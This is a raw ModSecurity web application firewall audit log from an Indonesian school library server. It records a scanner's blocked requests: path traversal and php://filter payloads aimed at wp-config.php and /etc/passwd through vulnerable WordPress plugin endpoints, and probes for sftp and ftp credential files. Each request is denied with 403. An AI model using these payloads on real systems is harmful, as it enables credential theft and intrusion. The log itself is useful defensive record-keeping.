"%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205547721 838 (- - -) Stopwatch2: 1745578205547721 838; combined=379, p1=346, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cef0c06-Z-- --48f01416-A-- [25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIgAAANQ 103.236.140.4 42696 103.236.140.4 8181 --48f01416-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268942 --48f01416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48f01416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205746005 806 (- - -) Stopwatch2: 1745578205746005 806; combined=336, p1=301, p2=0, p3=0, p4=0, p5=34, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f01416-Z-- --a6604636-A-- [25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIwAAANE 103.236.140.4 42700 103.236.140.4 8181 --a6604636-B-- GET /force-download.php?file=wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362410 --a6604636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6604636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205945914 943 (- - -) Stopwatch2: 1745578205945914 943; combined=374, p1=337, p2=0, p3=0, p4=0, p5=37, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6604636-Z-- --3eaab400-A-- [25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdAAAAE8 103.236.140.4 42708 103.236.140.4 8181 --3eaab400-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362413 --3eaab400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3eaab400-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578206143650 705 (- - -) Stopwatch2: 1745578206143650 705; combined=269, p1=241, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3eaab400-Z-- --304c3637-A-- [25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdQAAAEg 103.236.140.4 42712 103.236.140.4 8181 --304c3637-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268948 --304c3637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --304c3637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578206341155 677 (- - -) Stopwatch2: 1745578206341155 677; combined=273, p1=247, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304c3637-Z-- --46687c77-A-- [25/Apr/2025:17:50:08 +0700] aAto4OXF4ZX3hX-IbN7iHwAAAI0 103.236.140.4 42740 103.236.140.4 8181 --46687c77-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268966 --46687c77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --46687c77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578208346373 714 (- - -) Stopwatch2: 1745578208346373 714; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46687c77-Z-- --5d0a481a-A-- [25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44QAAAAc 103.236.140.4 42746 103.236.140.4 8181 --5d0a481a-B-- GET /resources/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362434 --5d0a481a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5d0a481a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578208543925 902 (- - -) Stopwatch2: 1745578208543925 902; combined=400, p1=367, p2=0, p3=0, p4=0, p5=32, sr=159, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d0a481a-Z-- --f744851c-A-- [25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44wAAAAA 103.236.140.4 42750 103.236.140.4 8181 --f744851c-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362437 --f744851c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f744851c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578208943284 2058 (- - -) Stopwatch2: 1745578208943284 2058; combined=764, p1=382, p2=354, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f744851c-Z-- --a836d658-A-- [25/Apr/2025:17:50:11 +0700] aAto4z8HMZgF-3Y3GtGAhAAAAEc 103.236.140.4 42774 103.236.140.4 8181 --a836d658-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268990 --a836d658-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a836d658-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578211145678 1938 (- - -) Stopwatch2: 1745578211145678 1938; combined=728, p1=351, p2=350, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a836d658-Z-- --28fd6831-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAigAAAEg 103.236.140.4 42788 103.236.140.4 8181 --28fd6831-B-- GET /ftps.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268999 --28fd6831-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28fd6831-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578212145445 1900 (- - -) Stopwatch2: 1745578212145445 1900; combined=672, p1=318, p2=328, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28fd6831-Z-- --aab1a820-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjAAAAEY 103.236.140.4 42802 103.236.140.4 8181 --aab1a820-B-- GET /ftp-config.conf HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269002 --aab1a820-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aab1a820-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578212345273 1951 (- - -) Stopwatch2: 1745578212345273 1951; combined=708, p1=342, p2=339, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aab1a820-Z-- --e95b5d21-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjgAAAEw 103.236.140.4 42802 103.236.140.4 8181 --e95b5d21-B-- GET /prevlaravel/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269005 --e95b5d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e95b5d21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578212746091 685 (- - -) Stopwatch2: 1745578212746091 685; combined=320, p1=287, p2=0, p3=0, p4=0, p5=33, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95b5d21-Z-- --943ac32c-A-- [25/Apr/2025:17:50:12 +0700] aAto5OOdEP6frSVs8Cp45gAAAA4 103.236.140.4 42810 103.236.140.4 8181 --943ac32c-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362473 --943ac32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --943ac32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578212942933 814 (- - -) Stopwatch2: 1745578212942933 814; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --943ac32c-Z-- --ad6ce00a-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iOwAAAJM 103.236.140.4 42938 103.236.140.4 8181 --ad6ce00a-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269092 --ad6ce00a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad6ce00a-E-- --ad6ce00a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578222552148 1561 (- - -) Stopwatch2: 1745578222552148 1561; combined=515, p1=366, p2=121, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6ce00a-Z-- --e5913959-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPAAAAJI 103.236.140.4 42938 103.236.140.4 8181 --e5913959-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362559 --e5913959-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5913959-E-- --e5913959-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578222750899 1725 (- - -) Stopwatch2: 1745578222750899 1725; combined=482, p1=346, p2=108, p3=0, p4=0, p5=27, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5913959-Z-- --04b4de30-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPgAAAIo 103.236.140.4 42952 103.236.140.4 8181 --04b4de30-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362562 --04b4de30-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --04b4de30-E-- --04b4de30-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578222949339 2728 (- - -) Stopwatch2: 1745578222949339 2728; combined=644, p1=480, p2=134, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b4de30-Z-- --4bef930a-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iPwAAAIA 103.236.140.4 42952 103.236.140.4 8181 --4bef930a-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: 